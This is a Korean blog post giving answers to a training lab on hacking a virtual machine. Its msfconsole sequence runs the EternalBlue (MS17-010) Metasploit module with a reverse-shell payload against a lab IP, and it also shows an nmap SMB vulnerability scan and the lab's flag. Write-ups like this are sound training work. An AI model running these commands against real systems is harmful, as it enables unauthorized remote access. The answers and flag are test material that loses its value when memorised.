그루트 시큐리티 Task4 가상 머신 해킹 실습

심야·2023년 8월 22일
0

모의해킹

목록 보기
33/42

Task4 가상 머신 해킹 실습

1번 문제

영상에서 어떤 프로그램을 이용해서 타겟 머신에 공격자가 접근 가능한지 확인하나요?


  • 정답
    ping

2번 문제

영상에서 어떤 프로그램을 이용해서 타겟 머신을 스캔하나요?


  • 정답
    nmap

3번 문제

취약한 SMB 서비스를 스캔하기 위해서 어떤 nmap 스크립트를 사용했나요?


nmap -p 445 --script smb-vuln-ms17-010 -Pn -n --open -T4 10.10.18.199

  • 정답
    smb-vuln-ms17-010

4번 문제

메타스플로잇 프레임워크의 exploit/windows/smb/ms17_010_eternalblue 모듈을 사용해 익스플로잇을 진행할 때, 페이로드를 어떤걸로 바꿨었나요?


  • msfconsole 사용법
  msfconsole
  search ms17-010
  use 0
  set rhosts 10.10.18.199 [Target IP]
  set lhost 10.4.17.111 [Host IP]
  set payload windows/x64/shell/reverse_tcp
  exploit
  • 정답
    windows/x64/shell/reverse_tcp

5번 문제

PWN 성공! 플래그를 입력해주세요. 플래그 형식은 flag{XYZ} 입니다. 플래그 파일을 출력한 뒤, 그냥 출력값을 모두 드래그 해서 복사/붙여넣기 하세요.


  • 정답
    flag{access_the_machine}
profile
하루하루 성실하게, 인생 전체는 되는대로.

0개의 댓글